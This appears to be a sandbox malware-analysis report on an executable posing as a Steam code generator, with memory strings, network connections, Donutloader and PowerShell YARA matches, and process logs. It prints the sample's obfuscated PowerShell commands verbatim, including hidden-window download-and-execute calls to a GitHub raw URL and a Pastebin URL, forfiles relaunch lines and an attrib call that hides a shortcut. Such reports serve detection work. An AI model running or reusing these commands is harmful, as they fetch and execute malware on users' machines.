Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
Source: powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF308D000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt$
Source: steamcodegenerator.exeString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt%pinvalid
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txta
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtll
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtnp
Source: powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49763 version: TLS 1.2

System Summary

barindex
Source: amsi64_5660.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7248.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E1819F NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0000022AF4E1819F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635422300_2_00007FF663542230
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635604780_2_00007FF663560478
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663557C3C0_2_00007FF663557C3C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663564B840_2_00007FF663564B84
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663564C0B0_2_00007FF663564C0B
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635504140_2_00007FF663550414
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635569740_2_00007FF663556974
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635502100_2_00007FF663550210
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635521E80_2_00007FF6635521E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66355408C0_2_00007FF66355408C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66356203C0_2_00007FF66356203C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635590FC0_2_00007FF6635590FC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635549100_2_00007FF663554910
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66355980A0_2_00007FF66355980A
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66355000C0_2_00007FF66355000C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66355F0080_2_00007FF66355F008
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663550FD40_2_00007FF663550FD4
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66356354C0_2_00007FF66356354C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663542DE00_2_00007FF663542DE0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E1819F0_2_0000022AF4E1819F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E16AB70_2_0000022AF4E16AB7
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E18C530_2_0000022AF4E18C53
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E17D6F0_2_0000022AF4E17D6F
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_0000022AF4E51F000_2_0000022AF4E51F00
Source: amsi64_5660.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7248.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal96.troj.evad.winEXE@21/17@5/4
Source: C:\Users\user\Desktop\steamcodegenerator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf2k4eim.g1l.ps1Jump to behavior
Source: steamcodegenerator.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: steamcodegenerator.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\steamcodegenerator.exe "C:\Users\user\Desktop\steamcodegenerator.exe"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
